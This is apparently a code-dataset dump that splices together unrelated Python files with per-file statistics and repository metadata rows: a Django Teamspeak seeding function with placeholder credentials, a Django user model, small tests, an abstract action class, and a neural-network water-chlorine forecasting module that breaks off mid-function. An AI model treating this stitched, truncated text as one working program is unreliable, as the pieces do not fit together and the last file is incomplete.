# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from core.models import ConfigEntry
from Teamspeak.models import TeamspeakServer
from core.utils import get_config
def load_defaults():
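# Seeds a single placeholder Teamspeak server record. The argument order
# (host, query user, query password, query port, voice port) is assumed
# from typical TS3 ServerQuery defaults; the "bad*" credentials are
# placeholders meant to be replaced.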
ts3 = TeamspeakServer.create("localhost", "baduser", "badpass", "10011", "9887")
ts3.save()
| 37.652174 | 82 | 0.743649 | 124 | 866 | 5.177419 | 0.709677 | 0.093458 | 0.040498 | 0.049844 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026761 | 0.180139 | 866 | 22 | 83 | 39.363636 | 0.877465 | 0.691686 | 0 | 0 | 0 | 0 | 0.128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.166667 | 0.5 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 3 |
7c7361013f3a7b9971368dc2c25a05418213cbf7 | 29 | py | Python | UnitTests/__init__.py | YuriShporhun/YBio | 420e1fa8c8d0d56bfb6e56f1afcf277c73f1d968 | [
"Apache-2.0"
] | null | null | null | UnitTests/__init__.py | YuriShporhun/YBio | 420e1fa8c8d0d56bfb6e56f1afcf277c73f1d968 | [
"Apache-2.0"
] | null | null | null | UnitTests/__init__.py | YuriShporhun/YBio | 420e1fa8c8d0d56bfb6e56f1afcf277c73f1d968 | [
"Apache-2.0"
] | null | null | null | __author__ = 'Yuri Shporhun'
| 14.5 | 28 | 0.758621 | 3 | 29 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.72 | 0 | 0 | 0 | 0 | 0 | 0.448276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c7a35ec575fe9f29dac44ba63baf9dd56d48655 | 1,057 | py | Python | response/core/models/user_external.py | dgzlopes/response | 2e8d6d1110cdac302a3552b66f33d439dea37a7b | [
"MIT"
] | 8 | 2020-12-13T09:36:43.000Z | 2022-03-31T23:35:31.000Z | response/core/models/user_external.py | dgzlopes/response | 2e8d6d1110cdac302a3552b66f33d439dea37a7b | [
"MIT"
] | 39 | 2020-10-02T15:56:55.000Z | 2022-01-19T11:58:41.000Z | response/core/models/user_external.py | dgzlopes/response | 2e8d6d1110cdac302a3552b66f33d439dea37a7b | [
"MIT"
] | 3 | 2020-10-30T19:46:31.000Z | 2021-05-14T04:59:39.000Z | from django.contrib.auth.models import User
from django.db import models
class ExternalUserManager(models.Manager):
def get_or_create_slack(self, *args, **kwargs):
return self.get_or_create(app_id="slack", *args, **kwargs)
def update_or_create_slack(self, *args, **kwargs):
return self.update_or_create(app_id="slack", *args, **kwargs)
class ExternalUser(models.Model):
class Meta:
unique_together = ("owner", "app_id", "external_id")
owner = models.ForeignKey(User, on_delete=models.PROTECT, null=True, blank=True)
app_id = models.CharField(max_length=50, blank=False, null=False)
external_id = models.CharField(max_length=50, blank=False, null=False)
display_name = models.CharField(max_length=50, blank=False, null=False)
full_name = models.CharField(max_length=50, blank=True, null=True)
email = models.CharField(max_length=100, blank=True, null=True)
objects = ExternalUserManager()
def __str__(self):
return f"{self.display_name or self.external_id} ({self.app_id})"
| 37.75 | 84 | 0.720908 | 148 | 1,057 | 4.932432 | 0.337838 | 0.034247 | 0.123288 | 0.164384 | 0.421918 | 0.421918 | 0.421918 | 0.291781 | 0.190411 | 0.128767 | 0 | 0.012263 | 0.151372 | 1,057 | 27 | 85 | 39.148148 | 0.801561 | 0 | 0 | 0 | 0 | 0 | 0.082308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.105263 | 0.157895 | 0.947368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
7c7c81414791a11a686c1db3350b4387ca49624e | 512 | py | Python | tests/system/test_platform.py | paulocoutinhox/pygemstones | 79397ee187670dc78746a3b3f64ca6118cd3a86c | [
"MIT"
] | 2 | 2021-11-28T11:13:07.000Z | 2022-02-02T02:26:47.000Z | tests/system/test_platform.py | paulocoutinhox/pygemstones | 79397ee187670dc78746a3b3f64ca6118cd3a86c | [
"MIT"
] | 4 | 2022-01-04T22:22:09.000Z | 2022-01-21T06:44:03.000Z | tests/system/test_platform.py | paulocoutinhox/pygemstones | 79397ee187670dc78746a3b3f64ca6118cd3a86c | [
"MIT"
] | null | null | null | import pygemstones.system.platform as p
# -----------------------------------------------------------------------------
def test_windows():
ret = p.is_windows()
assert isinstance(ret, bool)
# -----------------------------------------------------------------------------
def test_linux():
ret = p.is_linux()
assert isinstance(ret, bool)
# -----------------------------------------------------------------------------
def test_macos():
ret = p.is_macos()
assert isinstance(ret, bool)
| 25.6 | 79 | 0.355469 | 39 | 512 | 4.512821 | 0.410256 | 0.119318 | 0.102273 | 0.392045 | 0.340909 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 512 | 19 | 80 | 26.947368 | 0.392857 | 0.455078 | 0 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.3 | 1 | 0.3 | false | 0 | 0.1 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7cb5de8677ae5ad6a1057d991768a49b492ffbc5 | 519 | py | Python | ultron/actions/__init__.py | Prakash2403/ultron | 7d1067eb98ef52f6a88299534ea204e7ae45d7a7 | [
"MIT"
] | 13 | 2017-08-15T15:50:13.000Z | 2019-06-03T10:24:50.000Z | ultron/actions/__init__.py | Prakash2403/ultron | 7d1067eb98ef52f6a88299534ea204e7ae45d7a7 | [
"MIT"
] | 3 | 2017-08-29T16:35:04.000Z | 2021-06-01T23:49:16.000Z | ultron/actions/__init__.py | Prakash2403/ultron | 7d1067eb98ef52f6a88299534ea204e7ae45d7a7 | [
"MIT"
] | 4 | 2017-08-16T09:33:59.000Z | 2019-06-05T07:25:30.000Z | """
The base class for all actions.
To define a new action, inherit from this class and then define all of the associated abstract methods.
"""
from abc import abstractmethod, ABC
class Action(ABC):
@abstractmethod
def execute(self, *args, **kwargs):
return
@abstractmethod
def post_execute(self, *args, **kwargs):
return
@abstractmethod
def pre_execute(self, *args, **kwargs):
return
def run(self):
self.pre_execute()
self.execute()
self.post_execute()
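# --- Illustrative sketch (not part of the original ultron package) ---
# Shows how Action is meant to be subclassed: implement the three abstract
# phases and let the inherited run() drive them in order. The EchoAction name
# and its print-based behaviour are hypothetical examples, not ultron APIs.
class EchoAction(Action):
    """Toy action that reports each phase it passes through."""
    def pre_execute(self, *args, **kwargs):
        print("pre_execute:", args, kwargs)
    def execute(self, *args, **kwargs):
        print("execute:", args, kwargs)
    def post_execute(self, *args, **kwargs):
        print("post_execute:", args, kwargs)
# EchoAction().run() calls pre_execute(), execute() and post_execute() in order.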
| 19.961538 | 86 | 0.639692 | 62 | 519 | 5.290323 | 0.467742 | 0.167683 | 0.137195 | 0.192073 | 0.35061 | 0.268293 | 0.268293 | 0 | 0 | 0 | 0 | 0 | 0.258189 | 519 | 25 | 87 | 20.76 | 0.851948 | 0.22736 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0 | 0.066667 | 0.2 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
7cba2cd283da139416a5e9b54e91d7ae58a1f4e5 | 143,685 | py | Python | swotann/nnetwork.py | dighr/swot-webapp | 17f738a1e9f0e11b9fe9625ddd8c9533d5f36e8f | [
"MIT"
] | null | null | null | swotann/nnetwork.py | dighr/swot-webapp | 17f738a1e9f0e11b9fe9625ddd8c9533d5f36e8f | [
"MIT"
] | null | null | null | swotann/nnetwork.py | dighr/swot-webapp | 17f738a1e9f0e11b9fe9625ddd8c9533d5f36e8f | [
"MIT"
] | null | null | null | import base64
import datetime
import io
import os
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from xlrd.xldate import xldate_as_datetime
from yattag import Doc
plt.rcParams.update({"figure.autolayout": True})
import matplotlib.gridspec as gridspec
import pandas as pd
import scipy.stats
import tensorflow as tf
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
import logging
"""
TF_CPP_MIN_LOG_LEVEL:
Defaults to 0, so all logs are shown. Set TF_CPP_MIN_LOG_LEVEL to 1 to filter out INFO logs, 2 to additionally filter out WARNING, 3 to additionally filter out ERROR.
"""
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1"
from tensorflow import keras
class NNetwork(object):
def __init__(self, network_count=200, epochs=1000):
logging.getLogger().setLevel(logging.INFO)
self.xl_dateformat = r"%Y-%m-%dT%H:%M"
self.model = None
self.pretrained_networks = []
self.software_version = "2.0.1"
self.input_filename = None
self.today = str(datetime.date.today())
self.avg_time_elapsed = 0
self.predictors_scaler = MinMaxScaler(feature_range=(-1, 1))
self.targets_scaler = MinMaxScaler(feature_range=(-1, 1))
self.history = None
self.file = None
self.skipped_rows = []
self.ruleset = []
self.layer1_neurons = 12
self.network_count = network_count
self.epochs = epochs
self.predictors = None
self.targets = None
self.predictions = None
self.avg_case_results_am = None
self.avg_case_results_pm = None
self.worst_case_results_am = None
self.worst_case_results_pm = None
self.WB_bandwidth = None
self.post_process_check = False # Is post-processed better than raw. If False, uses raw results, if true, uses post-processed results
self.optimizer = keras.optimizers.Nadam(lr=0.01, beta_1=0.9, beta_2=0.999)
self.model = keras.models.Sequential()
self.model.add(
keras.layers.Dense(self.layer1_neurons, input_dim=5, activation="tanh")
)
self.model.add(keras.layers.Dense(1, activation="linear"))
self.model.compile(loss="mse", optimizer=self.optimizer, metrics=["mse"])
def import_data_from_csv(self, filename):
"""
        Imports data into the network from a comma-separated values (CSV) file.
        Loads data stored in .csv format into the network.
        The data loaded by this method can be used both for training and for
        making predictions.
        :param filename: String containing the filename of the .csv file containing the input data (e.g. "input_data.csv")
"""
df = pd.read_csv(filename)
self.file = df.copy()
global FRC_IN
global FRC_OUT
global WATTEMP
global COND
# Locate the fields used as inputs/predictors and outputs in the loaded file
# and split them
if "se1_frc" in self.file.columns:
FRC_IN = "se1_frc"
WATTEMP = "se1_wattemp"
COND = "se1_cond"
FRC_OUT = "se4_frc"
elif "ts_frc1" in self.file.columns:
FRC_IN = "ts_frc1"
WATTEMP = "ts_wattemp"
COND = "ts_cond"
FRC_OUT = "hh_frc1"
elif "ts_frc" in self.file.columns:
FRC_IN = "ts_frc"
WATTEMP = "ts_wattemp"
COND = "ts_cond"
FRC_OUT = "hh_frc"
# Standardize the DataFrame by specifying rules
# To add a new rule, call the method execute_rule with the parameters (description, affected_column, query)
self.execute_rule("Invalid tapstand FRC", FRC_IN, self.file[FRC_IN].isnull())
self.execute_rule("Invalid household FRC", FRC_OUT, self.file[FRC_OUT].isnull())
self.execute_rule(
"Invalid tapstand date/time",
"ts_datetime",
self.valid_dates(self.file["ts_datetime"]),
)
self.execute_rule(
"Invalid household date/time",
"hh_datetime",
self.valid_dates(self.file["hh_datetime"]),
)
self.skipped_rows = df.loc[df.index.difference(self.file.index)]
self.file.reset_index(drop=True, inplace=True) # fix dropped indices in pandas
# Locate the rows of the missing data
drop_threshold = 0.90 * len(self.file.loc[:, [FRC_IN]])
nan_rows_watt = self.file.loc[self.file[WATTEMP].isnull()]
if len(nan_rows_watt) < drop_threshold:
self.execute_rule(
"Missing Water Temperature Measurement",
WATTEMP,
self.file[WATTEMP].isnull(),
)
nan_rows_cond = self.file.loc[self.file[COND].isnull()]
if len(nan_rows_cond) < drop_threshold:
self.execute_rule("Missing EC Measurement", COND, self.file[COND].isnull())
self.skipped_rows = df.loc[df.index.difference(self.file.index)]
self.file.reset_index(drop=True, inplace=True)
start_date = self.file["ts_datetime"]
end_date = self.file["hh_datetime"]
durations = []
all_dates = []
collection_time = []
for i in range(len(start_date)):
try:
# excel type
start = float(start_date[i])
end = float(end_date[i])
start = xldate_as_datetime(start, datemode=0)
if start.hour > 12:
collection_time = np.append(collection_time, 1)
else:
collection_time = np.append(collection_time, 0)
end = xldate_as_datetime(end, datemode=0)
except ValueError:
# kobo type
start = start_date[i][:16].replace("/", "-")
end = end_date[i][:16].replace("/", "-")
start = datetime.datetime.strptime(start, self.xl_dateformat)
if start.hour > 12:
collection_time = np.append(collection_time, 1)
else:
collection_time = np.append(collection_time, 0)
end = datetime.datetime.strptime(end, self.xl_dateformat)
durations.append((end - start).total_seconds())
all_dates.append(datetime.datetime.strftime(start, self.xl_dateformat))
self.durations = durations
self.time_of_collection = collection_time
self.avg_time_elapsed = np.mean(durations)
# Extract the column of dates for all data and put them in YYYY-MM-DD format
self.file["formatted_date"] = all_dates
predictors = {
FRC_IN: self.file[FRC_IN],
"elapsed time": (np.array(self.durations) / 3600),
"time of collection (0=AM, 1=PM)": self.time_of_collection,
}
self.targets = self.file.loc[:, FRC_OUT]
self.var_names = [
"Tapstand FRC (mg/L)",
"Elapsed Time",
"time of collection (0=AM, 1=PM)",
]
self.predictors = pd.DataFrame(predictors)
if len(nan_rows_watt) < drop_threshold:
self.predictors[WATTEMP] = self.file[WATTEMP]
self.var_names.append("Water Temperature(" + r"$\degree$" + "C)")
self.median_wattemp = np.median(self.file[WATTEMP].dropna().to_numpy())
self.upper95_wattemp = np.percentile(
self.file[WATTEMP].dropna().to_numpy(), 95
)
if len(nan_rows_cond) < drop_threshold:
self.predictors[COND] = self.file[COND]
self.var_names.append("EC (" + r"$\mu$" + "s/cm)")
self.median_cond = np.median(self.file[COND].dropna().to_numpy())
self.upper95_cond = np.percentile(self.file[COND].dropna().to_numpy(), 95)
self.targets = self.targets.values.reshape(-1, 1)
self.datainputs = self.predictors
self.dataoutputs = self.targets
self.input_filename = filename
def set_up_model(self):
self.optimizer = keras.optimizers.Nadam(lr=0.01, beta_1=0.9, beta_2=0.999)
self.model = keras.models.Sequential()
self.model.add(
keras.layers.Dense(
self.layer1_neurons,
input_dim=len(self.datainputs.columns),
activation="tanh",
)
)
self.model.add(keras.layers.Dense(1, activation="linear"))
self.model.compile(loss="mse", optimizer=self.optimizer)
def train_SWOT_network(self, directory):
"""Train the set of 200 neural networks on SWOT data
Trains an ensemble of 200 neural networks on se1_frc, water temperature,
water conductivity."""
if not os.path.exists(directory):
os.makedirs(directory)
self.predictors_scaler = self.predictors_scaler.fit(self.predictors)
self.targets_scaler = self.targets_scaler.fit(self.targets)
x = self.predictors
t = self.targets
self.calibration_predictions = []
self.trained_models = {}
for i in range(self.network_count):
logging.info('Training Network ' + str(i))
model_out = self.train_network(x, t, directory)
self.trained_models.update({'model_' + str(i): model_out})
def train_network(self, x, t, directory):
"""
Trains a single Neural Network on imported data.
        This method trains a neural network on data that have previously been imported
        using the import_data_from_csv() method.
        The network used is a multilayer perceptron (MLP). Input and output data are
        normalized using MinMax normalization.
        The input dataset is split into training and validation subsets; with the
        train_size used below, roughly one third of the samples are used for training
        and the remainder for validation.
        Early stopping on the validation loss is applied, and the trained network's
        predictions over the full calibration dataset are appended to
        self.calibration_predictions.
"""
tf.keras.backend.clear_session()
early_stopping_monitor = keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0, patience=10,
restore_best_weights=True)
x_norm = self.predictors_scaler.transform(x)
t_norm = self.targets_scaler.transform(t)
trained_model = keras.models.clone_model(self.model)
x_norm_train, x_norm_val, t_norm_train, t_norm_val = train_test_split(x_norm, t_norm, train_size=0.333,
shuffle=True)
new_weights = [np.random.uniform(-0.05, 0.05, w.shape) for w in trained_model.get_weights()]
trained_model.set_weights(new_weights)
trained_model.compile(loss='mse', optimizer=self.optimizer)
trained_model.fit(x_norm_train, t_norm_train, epochs=self.epochs, validation_data=(x_norm_val, t_norm_val),
callbacks=[early_stopping_monitor], verbose=0, batch_size=len(t_norm_train))
self.calibration_predictions.append(self.targets_scaler.inverse_transform(trained_model.predict(x_norm)))
return trained_model
def calibration_performance_evaluation(self, filename):
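        # Evaluates the trained ensemble against the calibration data:
        # (a) percent capture within nested ensemble confidence intervals
        #     (10%..100%, overall and for observations below 0.2 mg/L),
        # (b) rank histogram and its delta score, and
        # (c) CRPS, followed by a three-panel diagnostic figure saved to disk.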
Y_true = np.array(self.targets)
Y_pred = np.array(self.calibration_predictions)
FRC_X = self.datainputs[FRC_IN].to_numpy()
capture_all = (
np.less_equal(Y_true, np.max(Y_pred, axis=0))
* np.greater_equal(Y_true, np.min(Y_pred, axis=0))
* 1
)
capture_90 = (
np.less_equal(Y_true, np.percentile(Y_pred, 95, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 5, axis=0))
* 1
)
capture_80 = (
np.less_equal(Y_true, np.percentile(Y_pred, 90, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 10, axis=0))
* 1
)
capture_70 = (
np.less_equal(Y_true, np.percentile(Y_pred, 85, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 15, axis=0))
* 1
)
capture_60 = (
np.less_equal(Y_true, np.percentile(Y_pred, 80, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 20, axis=0))
* 1
)
capture_50 = (
np.less_equal(Y_true, np.percentile(Y_pred, 75, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 25, axis=0))
* 1
)
capture_40 = (
np.less_equal(Y_true, np.percentile(Y_pred, 70, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 30, axis=0))
* 1
)
capture_30 = (
np.less_equal(Y_true, np.percentile(Y_pred, 65, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 35, axis=0))
* 1
)
capture_20 = (
np.less_equal(Y_true, np.percentile(Y_pred, 60, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 40, axis=0))
* 1
)
capture_10 = (
np.less_equal(Y_true, np.percentile(Y_pred, 55, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 45, axis=0))
* 1
)
capture_all_20 = capture_all * np.less(Y_true, 0.2)
capture_90_20 = capture_90 * np.less(Y_true, 0.2)
capture_80_20 = capture_80 * np.less(Y_true, 0.2)
capture_70_20 = capture_70 * np.less(Y_true, 0.2)
capture_60_20 = capture_60 * np.less(Y_true, 0.2)
capture_50_20 = capture_50 * np.less(Y_true, 0.2)
capture_40_20 = capture_40 * np.less(Y_true, 0.2)
capture_30_20 = capture_30 * np.less(Y_true, 0.2)
capture_20_20 = capture_20 * np.less(Y_true, 0.2)
capture_10_20 = capture_10 * np.less(Y_true, 0.2)
length_20 = np.sum(np.less(Y_true, 0.2))
test_len = len(Y_true)
capture_all_sum = np.sum(capture_all)
capture_90_sum = np.sum(capture_90)
capture_80_sum = np.sum(capture_80)
capture_70_sum = np.sum(capture_70)
capture_60_sum = np.sum(capture_60)
capture_50_sum = np.sum(capture_50)
capture_40_sum = np.sum(capture_40)
capture_30_sum = np.sum(capture_30)
capture_20_sum = np.sum(capture_20)
capture_10_sum = np.sum(capture_10)
capture_all_20_sum = np.sum(capture_all_20)
capture_90_20_sum = np.sum(capture_90_20)
capture_80_20_sum = np.sum(capture_80_20)
capture_70_20_sum = np.sum(capture_70_20)
capture_60_20_sum = np.sum(capture_60_20)
capture_50_20_sum = np.sum(capture_50_20)
capture_40_20_sum = np.sum(capture_40_20)
capture_30_20_sum = np.sum(capture_30_20)
capture_20_20_sum = np.sum(capture_20_20)
capture_10_20_sum = np.sum(capture_10_20)
capture = [
capture_10_sum / test_len,
capture_20_sum / test_len,
capture_30_sum / test_len,
capture_40_sum / test_len,
capture_50_sum / test_len,
capture_60_sum / test_len,
capture_70_sum / test_len,
capture_80_sum / test_len,
capture_90_sum / test_len,
capture_all_sum / test_len,
]
capture_20 = [
capture_10_20_sum / length_20,
capture_20_20_sum / length_20,
capture_30_20_sum / length_20,
capture_40_20_sum / length_20,
capture_50_20_sum / length_20,
capture_60_20_sum / length_20,
capture_70_20_sum / length_20,
capture_80_20_sum / length_20,
capture_90_20_sum / length_20,
capture_all_20_sum / length_20,
]
self.percent_capture_cal = capture_all_sum / test_len
self.percent_capture_02_cal = capture_all_20_sum / length_20
self.CI_reliability_cal = (
(0.1 - capture_10_sum / test_len) ** 2
+ (0.2 - capture_20_sum / test_len) ** 2
+ (0.3 - capture_30_sum / test_len) ** 2
+ (0.4 - capture_40_sum / test_len) ** 2
+ (0.5 - capture_50_sum / test_len) ** 2
+ (0.6 - capture_60_sum / test_len) ** 2
+ (0.7 - capture_70_sum / test_len) ** 2
+ (0.8 - capture_80_sum / test_len) ** 2
+ (0.9 - capture_90_sum / test_len) ** 2
+ (1 - capture_all_sum / test_len) ** 2
)
self.CI_reliability_02_cal = (
(0.1 - capture_10_20_sum / length_20) ** 2
+ (0.2 - capture_20_20_sum / length_20) ** 2
+ (0.3 - capture_30_20_sum / length_20) ** 2
+ (0.4 - capture_40_20_sum / length_20) ** 2
+ (0.5 - capture_50_20_sum / length_20) ** 2
+ (0.6 - capture_60_20_sum / length_20) ** 2
+ (0.7 - capture_70_20_sum / length_20) ** 2
+ (0.8 - capture_80_20_sum / length_20) ** 2
+ (0.9 - capture_90_20_sum / length_20) ** 2
+ (1 - capture_all_20_sum / length_20) ** 2
)
# Rank Histogram
rank = []
for a in range(0, len(Y_true)):
n_lower = np.sum(np.greater(Y_true[a], Y_pred[:, a]))
n_equal = np.sum(np.equal(Y_true[a], Y_pred[:, a]))
            deviate_rank = np.random.randint(0, n_equal + 1)  # inclusive upper bound; replaces the deprecated np.random.random_integers
rank = np.append(rank, n_lower + deviate_rank)
rank_hist = np.histogram(rank, bins=self.network_count + 1)
delta = np.sum((rank_hist[0] - (test_len / ((self.network_count + 1)))) ** 2)
delta_0 = self.network_count * test_len / (self.network_count + 1)
self.delta_score_cal = delta / delta_0
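        # The delta score normalises rank-histogram flatness: delta_0 is the expected
        # sum of squared deviations for a perfectly reliable (uniform) histogram, so
        # values of delta / delta_0 near 1 indicate a reliable ensemble, while much
        # larger values indicate bias or spread problems.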
c = self.network_count
alpha = np.zeros((test_len, (c + 1)))
beta = np.zeros((test_len, (c + 1)))
low_outlier = 0
high_outlier = 0
for a in range(0, test_len):
observation = Y_true[a]
forecast = np.sort(Y_pred[:, a])
for b in range(1, c):
if observation > forecast[b]:
alpha[a, b] = forecast[b] - forecast[b - 1]
beta[a, b] = 0
elif forecast[b] > observation > forecast[b - 1]:
alpha[a, b] = observation - forecast[b - 1]
beta[a, b] = forecast[b] - observation
else:
alpha[a, b] = 0
beta[a, b] = forecast[b] - forecast[b - 1]
# overwrite boundaries in case of outliers
if observation < forecast[0]:
beta[a, 0] = forecast[0] - observation
low_outlier += 1
if observation > forecast[c - 1]:
alpha[a, c] = observation - forecast[c - 1]
high_outlier += 1
alpha_bar = np.mean(alpha, axis=0)
beta_bar = np.mean(beta, axis=0)
g_bar = alpha_bar + beta_bar
o_bar = beta_bar / (alpha_bar + beta_bar)
if low_outlier > 0:
o_bar[0] = low_outlier / test_len
g_bar[0] = beta_bar[0] / o_bar[0]
else:
o_bar[0] = 0
g_bar[0] = 0
if high_outlier > 0:
o_bar[c] = high_outlier / test_len
g_bar[c] = alpha_bar[c] / o_bar[c]
else:
o_bar[c] = 0
g_bar[c] = 0
p_i = np.arange(0 / c, (c + 1) / c, 1 / c)
self.CRPS_cal = np.sum(
g_bar * ((1 - o_bar) * (p_i**2) + o_bar * ((1 - p_i) ** 2))
)
CI_x = [0.10, 0.20, 0.30, 0.40, 0.50, 0.60, 0.70, 0.80, 0.90, 1.00]
fig = plt.figure(figsize=(15, 10), dpi=100)
gridspec.GridSpec(2, 3)
plt.subplot2grid((2, 3), (0, 0), colspan=2, rowspan=2)
plt.axhline(0.2, c="k", ls="--", label="Point-of-consumption FRC = 0.2 mg/L")
plt.scatter(
FRC_X, Y_true, edgecolors="k", facecolors="None", s=20, label="Observed"
)
plt.scatter(
FRC_X,
np.median(Y_pred, axis=0),
facecolors="r",
edgecolors="None",
s=10,
label="Forecast Median",
)
plt.vlines(
FRC_X,
np.min(Y_pred, axis=0),
np.max(Y_pred, axis=0),
color="r",
label="Forecast Range",
)
plt.xlabel("Point-of-Distribution FRC (mg/L)")
plt.ylabel("Point-of-Consumption FRC (mg/L)")
plt.xlim([0, np.max(FRC_X)])
plt.legend(
bbox_to_anchor=(0.001, 0.999),
shadow=False,
labelspacing=0.1,
fontsize="small",
handletextpad=0.1,
loc="upper left",
)
ax1 = fig.axes[0]
ax1.set_title("(a)", y=0.88, x=0.05)
plt.subplot2grid((2, 3), (0, 2), colspan=1, rowspan=1)
plt.plot(CI_x, CI_x, c="k")
plt.scatter(CI_x, capture, label="All observations")
plt.scatter(CI_x, capture_20, label="Point-of-Consumption FRC below 0.2 mg/L")
plt.xlabel("Ensemble Confidence Interval")
plt.ylabel("Percent Capture")
plt.ylim([0, 1])
plt.xlim([0, 1])
plt.legend(
bbox_to_anchor=(0.001, 0.999),
shadow=False,
labelspacing=0.1,
fontsize="small",
handletextpad=0.1,
loc="upper left",
)
ax2 = fig.axes[1]
ax2.set_title("(b)", y=0.88, x=0.05)
plt.subplot2grid((2, 3), (1, 2), colspan=1, rowspan=1)
plt.hist(rank, bins=(self.network_count + 1), density=True)
plt.xlabel("Rank")
plt.ylabel("Probability")
ax3 = fig.axes[2]
ax3.set_title("(c)", y=0.88, x=0.05)
plt.savefig(
os.path.splitext(filename)[0] + "_Calibration_Diagnostic_Figs.png",
format="png",
bbox_inches="tight",
)
plt.close()
myStringIOBytes = io.BytesIO()
plt.savefig(myStringIOBytes, format="png", bbox_inches="tight")
myStringIOBytes.seek(0)
my_base_64_pngData = base64.b64encode(myStringIOBytes.read())
return my_base_64_pngData
def get_bw(self):
Y_true = np.array(self.targets)
Y_pred = np.array(self.calibration_predictions)[:, :, 0]
s2 = []
xt_yt = []
for a in range(0, len(Y_true)):
observation = Y_true[a]
forecast = np.sort(Y_pred[:, a])
s2 = np.append(s2, np.var(forecast))
xt_yt = np.append(xt_yt, (np.mean(forecast) - observation) ** 2)
WB_bw = np.mean(xt_yt) - (1 + 1 / self.network_count) * np.mean(s2)
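        # WB_bw is a variance-deficit estimate used as the kernel bandwidth:
        # the mean squared error of the ensemble mean minus (1 + 1/m) times the
        # mean ensemble variance (m = ensemble size). A positive value indicates
        # the raw ensemble is under-dispersed relative to the observations.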
return WB_bw
def post_process_performance_eval(self, bandwidth):
Y_true = np.squeeze(np.array(self.targets))
Y_pred = np.array(self.calibration_predictions)[:, :, 0]
test_len = len(Y_true)
min_CI = []
max_CI = []
CI_90_Lower = []
CI_90_Upper = []
CI_80_Lower = []
CI_80_Upper = []
CI_70_Lower = []
CI_70_Upper = []
CI_60_Lower = []
CI_60_Upper = []
CI_50_Lower = []
CI_50_Upper = []
CI_40_Lower = []
CI_40_Upper = []
CI_30_Lower = []
CI_30_Upper = []
CI_20_Lower = []
CI_20_Upper = []
CI_10_Lower = []
CI_10_Upper = []
CI_median = []
CRPS = []
Kernel_Risk = []
evaluation_range = np.arange(-10, 10.001, 0.001)
# compute CRPS as well as the confidence intervals of each ensemble forecast
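        # The CRPS of each forecast is approximated on the discrete grid:
        # CRPS ~= sum over x of (F(x) - H(x - y))^2 * dx, where F is the KDE-smoothed
        # forecast CDF, H the Heaviside step at the observation y, and dx = 0.001
        # (the spacing of evaluation_range). Confidence-interval bounds are read off
        # F at the matching quantile levels.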
for a in range(0, test_len):
scipy_kde = scipy.stats.gaussian_kde(Y_pred[:, a], bw_method=bandwidth)
scipy_pdf = scipy_kde.evaluate(evaluation_range) * 0.001
scipy_cdf = np.cumsum(scipy_pdf)
min_CI = np.append(
min_CI, evaluation_range[np.max(np.where(scipy_cdf == 0)[0])]
)
max_CI = np.append(max_CI, evaluation_range[np.argmax(scipy_cdf)])
CI_90_Lower = np.append(
CI_90_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.05)))]
)
CI_90_Upper = np.append(
CI_90_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.95)))]
)
CI_80_Lower = np.append(
